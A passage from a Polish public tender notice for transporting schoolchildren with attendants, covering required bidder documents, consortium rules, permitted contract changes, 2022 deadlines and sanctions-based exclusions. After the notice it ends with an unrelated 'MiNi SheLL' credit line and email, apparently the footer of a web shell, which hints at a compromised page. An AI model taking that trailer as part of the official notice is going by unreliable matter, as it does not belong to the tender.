reprezentowania<br/>Wykonawcy/Wykonawców.<br/>3. Wykaz osób - opiekunów skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, w zakresie wymaganym w punkcie<br/>III.B.2.5) SWZ – wykaz opiekunów stanowi załącznik nr 12 do SWZ.<br/>Uwaga – W przypadku złożenia wraz z ofertą załącznika nr 1A do SWZ do kryterium oceny ofert „Doświadczenie opiekunów”, w<br/>którym Wykonawca potwierdzi warunek udziału<br/>w postępowaniu, Zamawiający uzna go jako skutecznie złożony i oceni spełnienie warunki udziału na jego podstawie.<br/>Wykaz osób - opiekunów należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do<br/>reprezentowania Wykonawcy/Wykonawców.<br/>4. Wykaz urządzeń technicznych - pojazdów dostępnych Wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie<br/>dysponowania tymi zasobami, w zakresie wymaganym w punkcie III.B.2.2) SWZ – wykaz pojazdów stanowi załącznik nr 13 do SWZ.<br/>Wykonawca, który wraz z ofertą prawidłowo złoży informację do kryterium oceny ofert „Średni rok produkcji pojazdów<br/>przeznaczonych do realizacji zamówienia” lub informację do kryterium oceny ofert „Doświadczenie opiekunów” nie zostanie<br/>wezwany do złożenia odpowiednio wykazu urządzeń technicznych - pojazdów lub wykazu osób – opiekunów, gdyż Zamawiający<br/>będzie posiadał przedmiotowe oświadczenia dotyczące tego Wykonawcy.<br/>W przypadku gdy Wykonawca zmieni treść oświadczeń w ww. zakresie, Zamawiający nie przyzna punktów w odpowiednim<br/>kryterium.<br/>5. Aktualna licencja na wykonywanie krajowego transportu drogowego w zakresie przewozu osób, o której mowa w ustawie z dnia 6<br/>września 2001 r. o transporcie drogowym (tj. Dz. U. z 2022 r. poz. 180 ze zm.), obejmującą co najmniej obszar wskazany w opisie<br/>przedmiotu zamówienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W niniejszym postępowaniu Zamawiający wymaga złożenia w Systemie wraz z ofertą przedmiotowych środków<br/>dowodowych.<br/>W przypadku gdy Wykonawca ubiega się o dodatkowe punkty w kryterium oceny ofert Średni rok produkcji pojazdów<br/>przeznaczonych do realizacji zamówienia, wówczas zobowiązany jest podać wszystkie wymagane w pkt 2 formularza oferty<br/>informacje, tj. Wykonawca zobowiązany jest do wypełnienia wszystkich pozycji tabeli zamieszczonej w pkt 2 formularza<br/>oferty, w tym zobowiązany jest do podania marki i modelu samochodu, roku produkcji pojazdu, nr rejestracyjnego, ponadto<br/>zobowiązany jest do potwierdzenia spełnienia przez oferowany pojazd warunku określonego w SWZ oraz podania podstawy<br/>dysponowania pojazdem.<br/>W przypadku gdy Wykonawca ubiega się o dodatkowe punkty w kryterium oceny ofert Doświadczenie opiekunów (D),<br/>wówczas zobowiązany jest do złożenia wraz z ofertą „Informacja do kryterium oceny ofert - Doświadczenia opiekunów<br/>skierowanych przez Wykonawcę do realizacji zamówienia” (Załącznik nr 1A do SWZ) wraz z dokumentami potwierdzającymi<br/>doświadczenie opiekunów.<br/>Powyższe dokument, tj. „Informację do kryterium oceny ofert - Doświadczenia opiekunów skierowanych przez Wykonawcę<br/>do realizacji zamówienia” (Załącznik nr 1A do SWZ) wraz z dokumentami potwierdzającymi doświadczenie opiekunów<br/>składa się wraz z ofertą w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę<br/>upoważnioną do reprezentowania odpowiednio Wykonawcy lub Wykonawców wspólnie ubiegającego się o udzielenie<br/>zamówienia.<br/>Zgodnie z art. 107 ust. 3 ustawy ww. przedmiotowe środki dowodowe służą do oceny ofert i nie podlegają uzupełnieniu w<br/>niniejszym postępowaniu. Jeśli Wykonawca nie złoży wraz z ofertą wszystkich ww. przedmiotowych środków dowodowych,<br/>wówczas oferta Wykonawcy zostanie oceniona zgodnie z V.B.B.2 SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Zamawiający wymaga w niniejszym postępowaniu złożenia za pośrednictwem Systemu wypełnionego i odpowiednio<br/>podpisanego formularza oferty o treści zgodnej ze wzorem stanowiącym Załącznik nr 1 do SWZ.<br/>W tym postępowaniu należy złożyć ofertę korzystając z formularza ofertowego załączonego w zakładce „Dokumenty<br/>zamówienia”. Składanie ofert polega na załączeniu odpowiednio wypełnionych i podpisanych dokumentów i przekazaniu ich<br/>za pośrednictwem Systemu.<br/>Uwaga<br/>W przypadku gdy Wykonawca ubiega się o dodatkowe punkty w kryterium oceny ofert Doświadczenie opiekunów (D),<br/>wówczas zobowiązany jest do złożenia „Informacja do kryterium oceny ofert - Doświadczenia opiekunów skierowanych<br/>przez Wykonawcę do realizacji zamówienia” (Załącznik nr 1A<br/>do SWZ) wraz z dokumentami potwierdzającymi doświadczenie opiekunów (zobacz przedmiotowe środki dowodowe).<br/>2) Ponadto wraz z ofertą należy złożyć:<br/>a) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy), z którego wynika, które<br/>roboty budowlane lub usługi, wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy), o treści zgodnej ze wzorem<br/>stanowiącym Załącznik nr 3 do SWZ.<br/>b) Oświadczenie o podstawach wykluczenia wymienionych w art. 108 ust. 1 pkt 1, 2 i 5 (jeżeli dotyczy) o treści zgodnej ze<br/>wzorem stanowiącym Załącznik nr 5 do SWZ.<br/>c) Dokument potwierdzający umocowanie do reprezentowania Wykonawcy (np. pełnomocnictwo, odpis z właściwego<br/>rejestru, np. Krajowego Rejestru Sądowego, informacja o wpisie do Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej Rzeczypospolitej Polskiej lub umowa spółki cywilnej, itp.), zgodnie z obowiązującymi przepisami.<br/>d) Dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe umocowanie,<br/>pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w<br/>postępowaniu i zawarcia umowy.<br/>e) Zobowiązanie podmiotów udostępniających zasoby lub inny podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>e.1) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia<br/>wraz z oświadczeniem, o którym mowa w lit. a powyżej, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>f)Przedmiotowe środki dowodowe - zgodnie z SWZ.<br/>g) Inne dokumenty lub oświadczenia wymagane w postępowaniu<br/>W przypadku gdy oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa, Wykonawca zobowiązany jest do<br/>złożenia wraz z ofertą dowodów, o których mowa w pkt VII B SWZ.<br/>W przypadku przekazywania dokumentów elektronicznych stanowiących tajemnicę przedsiębiorstwa<br/>z wykorzystaniem Systemu, Wykonawca powinien w okienku dodawania pliku określić typ dokumentu jako „Tajemnica przedsiębiorstwa”. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. spółka cywilna/konsorcjum)<br/>1. W przypadku składania oferty przez podmioty występujące wspólnie:<br/>a) podmioty występujące wspólnie zobowiązane są do ustanowienia w formie pisemnej Pełnomocnika reprezentującego ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego;<br/>b) dokument potwierdzający umocowanie do reprezentowania należy dołączyć do oferty w formie oryginału lub cyfrowego<br/>odwzorowania pełnomocnictwa sporządzonego w postaci papierowej, poświadczonego zgodnie z obowiązującymi<br/>przepisami<br/>W/w dokument powinien zawierać w szczególności wskazanie:<br/> postępowania o zamówienie publiczne, którego dotyczy,<br/> wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego,<br/> ustanowionego Pełnomocnika oraz zakresu jego umocowania;<br/>c) korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w<br/>formularzu oferty;<br/>d) Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę<br/>podmiotów występujących wspólnie;<br/>e) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z powodu przesłanek, o których mowa w art. 108 ust. 1 ustawy oraz art. 7 ust. 1 ustawy z dnia 15 kwietnia 2022<br/>r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz.U. z 2022 poz. 835).<br/>Oświadczenia, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie w zakresie jego dotyczącym.<br/>Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w<br/>którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmianę postanowień umowy według wzoru umowy - Załącznik nr 8 do SWZ, w szczególności:<br/>§ 1 ust. 4 wzoru umowy<br/>Zamawiający zastrzega sobie prawo do zmian na liście dowożonych uczniów i związaną z tym zmianę adresów<br/>zamieszkania dzieci i adresów szkół, do których uczęszczają, a także do wykazu dni nauki szkolnej. O każdej zmianie<br/>Zamawiający poinformuje Wykonawcę na piśmie.<br/>§ 11 wzoru umowy<br/>1. Zamawiający zastrzega sobie możliwość zmian postanowień umowy w zakresie przedmiotu zamówienia:<br/>1) w odniesieniu do zmiany samochodu skierowanego do realizacji zamówienia,<br/>z zastrzeżeniem, że nowy samochód musi spełniać warunek określony przez Zamawiającego w procedurze o udzielenie<br/>zamówienia publicznego, będącego przedmiotem umowy;<br/>2) w odniesieniu do szkół i placówek, do których uczęszczają dzieci (dotyczy zmiany szkoły/placówki w trakcie roku szkolnego);<br/>3) w przypadku rezygnacji z dowozu, zastąpienie jednego dziecka innym dzieckiem, którego podanie o dowóz wpłynęło w trakcie realizacji zamówienia, bez względu na adres zamieszkania i adres placówki, do której dziecko będzie dowożone;<br/>4) w odniesieniu do adresu zamieszkania dzieci (dotyczy zmiany adresu zamieszkania w trakcie roku szkolnego);<br/>5) w odniesieniu do możliwości zwiększenia liczby dzieci dowożonych do maksymalnie 30 w zakresie poszerzenia wykazu - opis przedmiotu zamówienia.<br/>2. Zmiany postanowień umowy wymienione w pkt. 2 nie spowodują zmian wynagrodzenia jednostkowego (1 dzień).<br/>3. Wszelkie zmiany dokonane z naruszeniem zasady określonej w art. 455 ust. 2 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, są nieważne.<br/>4. Wykonawca jest zobowiązany w terminie 7 dni do pisemnego zawiadomienia Zamawiającego o zmianie danych zawartych w umowie:<br/>1) zmianie siedziby lub nazwy firmy Wykonawcy;<br/>2) zmianie osób reprezentujących Wykonawcę;<br/>3) ogłoszeniu upadłości Wykonawcy;<br/>4) likwidacji firmy Wykonawcy.<br/>5. Zmiana ta nie wymaga dokonania zmiany umowy.<br/>6. W przypadku niepowiadomienia przez Wykonawcę Zamawiającego o zmianie danych zawartych w umowie, wszelką korespondencję wysyłaną przez Zamawiającego zgodnie z posiadanymi przez niego danymi strony uznaje się za doręczoną. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-06 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art.<br/>108 ust. 1 ustawy oraz art. 7 ust. 1 ustawy z dnia 15 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz.<br/>835).<br/>Art. 7 ww. ustawy:<br/>1. Z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11<br/>września 2019 r. – Prawo zamówień publicznych wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu<br/>na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.<br/>Zamawiający informuję, że:<br/>3. Zamawiający informuje, że zgodnie z art. 7 ust. 6-7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z<br/>2022 r. poz. 835) osoba lub podmiot podlegające wykluczeniu na podstawie art. 7 ust. 1 tej ustawy, które w okresie tego<br/>wykluczenia ubiegają się o udzielenie zamówienia publicznego lub biorą udział w postępowaniu o udzielenie zamówienia<br/>publicznego podlegają karze pieniężnej. Karę pieniężną, o której mowa w ust. 6 tej ustawy, nakłada Prezes Urzędu<br/>Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł.

Creat By MiNi SheLL
Email: jattceo@gmail.com